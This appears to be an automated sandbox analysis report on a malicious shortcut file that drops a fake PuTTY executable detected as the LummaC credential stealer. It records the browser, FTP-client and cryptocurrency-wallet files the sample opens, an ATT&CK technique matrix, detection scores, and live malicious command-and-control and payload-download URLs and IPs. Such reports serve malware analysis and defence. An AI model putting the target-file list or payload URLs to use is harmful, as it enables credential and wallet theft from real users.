Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior

Source: Yara match

File source: Process Memory Space: putty.exe PID: 2568, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: putty.exe PID: 2568, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	2 OS Credential Dumping	1 Network Share Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	121 Virtualization/Sandbox Evasion	LSASS Memory	2 System Time Discovery	Remote Desktop Protocol	41 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	4 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	131 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	121 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	12 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	12 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	35 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
d2W4YpqsKg.lnk	8%	ReversingLabs
d2W4YpqsKg.lnk	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\putty.exe	3%	ReversingLabs

Source	Detection	Scanner	Label
https://immureprech.biz/	100%	Avira URL Cloud	malware
https://todmeng.com/C	0%	Avira URL Cloud	safe
https://todmeng.com/webdav/infrarecorder.exe	0%	Avira URL Cloud	safe
https://todmeng.com	0%	Avira URL Cloud	safe
https://todmeng.com/1ae33ca0e236cf5	0%	Avira URL Cloud	safe
https://immureprech.biz/apilf	100%	Avira URL Cloud	malware
https://todmeng.com/webdav	0%	Avira URL Cloud	safe
https://immureprech.biz/ts	100%	Avira URL Cloud	malware
https://immureprech.biz/p	100%	Avira URL Cloud	malware
https://immureprech.biz/apiOiL6	100%	Avira URL Cloud	malware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696513144932.12791&key=1696513144400700	0%	Avira URL Cloud	safe
https://todmeng.com/#	0%	Avira URL Cloud	safe
http://todmeng.com/webdav/infrarecorder.exe	0%	Avira URL Cloud	safe
https://immureprech.biz/_	100%	Avira URL Cloud	malware
https://immureprech.biz/api	100%	Avira URL Cloud	malware
http://todmeng.com	0%	Avira URL Cloud	safe
https://immureprech.biz/pio	100%	Avira URL Cloud	malware
https://immureprech.biz/apiz_	100%	Avira URL Cloud	malware
https://todmeng.com/s	0%	Avira URL Cloud	safe
https://todmeng.com/webdav/adv.ps1	0%	Avira URL Cloud	safe
https://todmeng.comGetF	0%	Avira URL Cloud	safe
http://infrarecorder.orgInfraRecorder	0%	Avira URL Cloud	safe
https://immureprech.biz:443/api	100%	Avira URL Cloud	malware
https://immureprech.biz/pig	100%	Avira URL Cloud	malware
https://immureprech.biz/apizq	100%	Avira URL Cloud	malware
https://todmeng.com/	0%	Avira URL Cloud	safe
https://todmeng.com:443/i	0%	Avira URL Cloud	safe
http://infrarecorder.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
immureprech.biz	172.67.207.38	true	true	unknown
todmeng.com	185.147.125.51	true	true	unknown
debonairnukk.xyz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
sordid-snaked.cyou	false		high
https://todmeng.com/webdav/infrarecorder.exe	false	Avira URL Cloud: safe	unknown
deafeninggeh.biz	false		high
diffuculttan.xyz	false		high
effecterectz.xyz	false		high
wrathful-jammy.cyou	false		high
http://todmeng.com/webdav/infrarecorder.exe	false	Avira URL Cloud: safe	unknown
awake-weaves.cyou	false		high
immureprech.biz	false		high
https://todmeng.com/webdav/adv.ps1	false	Avira URL Cloud: safe	unknown
https://immureprech.biz/api	true	Avira URL Cloud: malware	unknown
debonairnukk.xyz	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://immureprech.biz/	putty.exe, 0000000D.00000002.2000058451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000002.1999856506.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1988739451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1989170343.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://todmeng.com	powershell.exe, 0000000B.00000002.1740211550.000001B90F339000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://todmeng.com/1ae33ca0e236cf5	net.exe, 00000003.00000002.1521291382.000001D00EF6E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://immureprech.biz/ts	putty.exe, 0000000D.00000002.2000058451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1988739451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/License	powershell.exe, 0000000B.00000002.1770722325.000001B91DCA4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://todmeng.com/C	net.exe, 00000003.00000002.1521291382.000001D00EF92000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://immureprech.biz/apilf	putty.exe, 0000000D.00000002.1999856506.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1989170343.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_b07fa4138d6cee96061521c23bb7cd6608bee0c31ef2bfdc	putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://todmeng.com/webdav	net.exe, 00000003.00000002.1521291382.000001D00EF92000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1521291382.000001D00EF2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 0000000B.00000002.1770722325.000001B91DCA4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000B.00000002.1770722325.000001B91DDE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1770722325.000001B91DCA4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://immureprech.biz/apiOiL6	putty.exe, 0000000D.00000003.1895640137.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1895232262.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://immureprech.biz/p	putty.exe, 0000000D.00000002.2000058451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1988739451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696513144932.12791&key=1696513144400700	putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://todmeng.com/#	net.exe, 00000003.00000002.1521291382.000001D00EF92000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	putty.exe, 0000000D.00000003.1897259335.0000000003B37000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000B.00000002.1740211550.000001B90DC21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000B.00000002.1770722325.000001B91DDE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1770722325.000001B91DCA4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://todmeng.com	powershell.exe, 0000000B.00000002.1740211550.000001B90F339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1740211550.000001B90EA63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1740211550.000001B90DE47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1740211550.000001B90F356000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000B.00000002.1740211550.000001B90DE47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://todmeng.com/s	net.exe, 00000003.00000002.1521291382.000001D00EF6E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000B.00000002.1740211550.000001B90DE47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://immureprech.biz/apiz_	putty.exe, 0000000D.00000002.1999856506.0000000000B83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://go.micro	powershell.exe, 0000000B.00000002.1740211550.000001B90EA63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000B.00000002.1770722325.000001B91DCA4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696513144932.12791&key=1696513144400700003.1&cta	putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	putty.exe, 0000000D.00000003.1897259335.0000000003B37000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000B.00000002.1740211550.000001B90DE47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://immureprech.biz/_	putty.exe, 0000000D.00000002.2000058451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://immureprech.biz/pio	putty.exe, 0000000D.00000003.1988739451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4ClZfC2k4pbW4ZbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi	putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://todmeng.comGetF	powershell.exe, 0000000B.00000002.1740211550.000001B90DFF5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://immureprech.biz/pig	putty.exe, 0000000D.00000002.2000058451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://immureprech.biz:443/api	putty.exe, 0000000D.00000003.1959137585.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1961112040.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://infrarecorder.orgInfraRecorder	putty.exe, 0000000D.00000000.1705659608.00000000003DD000.00000002.00000001.01000000.00000008.sdmp, putty.exe, 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmp, putty.exe, 0000000D.00000003.1795701119.0000000003190000.00000004.00000800.00020000.00000000.sdmp, putty.exe.11.dr	false	Avira URL Cloud: safe	unknown
https://immureprech.biz/apizq	putty.exe, 0000000D.00000002.1999856506.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1989170343.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	false		high
http://infrarecorder.org	putty.exe, 0000000D.00000000.1705659608.00000000003DD000.00000002.00000001.01000000.00000008.sdmp, putty.exe, 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmp, putty.exe, 0000000D.00000003.1795701119.0000000003190000.00000004.00000800.00020000.00000000.sdmp, putty.exe.11.dr	false	Avira URL Cloud: safe	unknown
https://todmeng.com/	net.exe, 00000003.00000003.1351399766.000001D00EEEB000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1521291382.000001D00EF6E000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000003.1351399766.000001D00EEDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 0000000B.00000002.1740211550.000001B90DC21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://todmeng.com:443/i	net.exe, 00000003.00000003.1351399766.000001D00EEEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.147.125.51	todmeng.com	Russian Federation		20655	E-STYLEISP-ASRU	true
172.67.207.38	immureprech.biz	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574820
Start date and time:	2024-12-13 16:42:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	d2W4YpqsKg.lnk renamed because original name is a hash value
Original Sample Name:	80eea127b8641313f5065b35a541dfff1a5dfd645a2e6e31b353ecd2d756cc46.lnk
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winLNK@11/5@7/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: d2W4YpqsKg.lnk

Simulations

Behavior and APIs

Time	Type	Description
10:43:04	API Interceptor	1x Sleep call for process: net.exe modified
10:43:30	API Interceptor	44x Sleep call for process: powershell.exe modified
10:43:49	API Interceptor	9x Sleep call for process: putty.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.207.38	QnNRjhoN.ps1	Get hash	malicious	LummaC	Browse
	infrarecorder.exe	Get hash	malicious	LummaC	Browse
	Captcha.hta	Get hash	malicious	LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse
	http://gerxx.ru	Get hash	malicious	Unknown	Browse
	https://tdazl.fgfhgjyukh.top/?jul=17Y2Fzc2FuZHJhLmFwbGV5QHRoZXJtb2Zpc2hlci5jb20=	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
immureprech.biz	QnNRjhoN.ps1	Get hash	malicious	LummaC	Browse	172.67.207.38
	infrarecorder.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	Captcha.hta	Get hash	malicious	LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	172.67.207.38
s-part-0035.t-0009.t-msedge.net	https://poplast-poplast.powerappsportals.com/?e=e83cfd89&h=e7e60467&f=y&p=y&l=1	Get hash	malicious	Unknown	Browse	13.107.246.63
	https://t.co/4MnukUbNZX	Get hash	malicious	Unknown	Browse	13.107.246.63
	SoundDrv.dll.dll	Get hash	malicious	Unknown	Browse	13.107.246.63
	https://nam.dcv.ms/0CX72Iqyxf	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	ALGKSLPKD8.doc	Get hash	malicious	Unknown	Browse	13.107.246.63
	https://app.seesaw.me/pages/shared_item?item_id=item.458620ed-6ab6-4874-8a90-aa31b75d3cd6&share_token=lEkLLLT6TUehqWhupDFOAA&mode=share	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.63
	17340930102031dcdc4a249f5e0ed34fe8c1887a544d2e39d1f54731472cf7d932223abe8f769.dat-decoded.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	http://home45insurance.blogspot.com	Get hash	malicious	Unknown	Browse	13.107.246.63
	888.exe	Get hash	malicious	Luca Stealer	Browse	13.107.246.63
	payload-c17f7df6-cf80-43d5-8c60-eca90366debb.exe	Get hash	malicious	Metasploit	Browse	13.107.246.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
E-STYLEISP-ASRU	MHDeXPq2uB.exe	Get hash	malicious	RedLine	Browse	185.147.124.236
	n70CrSGL8G.exe	Get hash	malicious	RedLine	Browse	185.147.124.236
	7H1FDG3DI1.exe	Get hash	malicious	RedLine, SectopRAT	Browse	185.147.124.236
	Agreement for Cooperation.PDF.lnk.download.lnk	Get hash	malicious	RedLine	Browse	185.147.124.236
	d0pHF4Pcpc.exe	Get hash	malicious	RedLine, SectopRAT	Browse	185.147.124.236
	krNl37E9B2.exe	Get hash	malicious	RedLine	Browse	185.147.124.236
	https://fparnter-externet.com/	Get hash	malicious	CAPTCHA Scam ClickFix, XWorm	Browse	185.147.124.40
	somes.exe	Get hash	malicious	RedLine	Browse	185.147.124.236
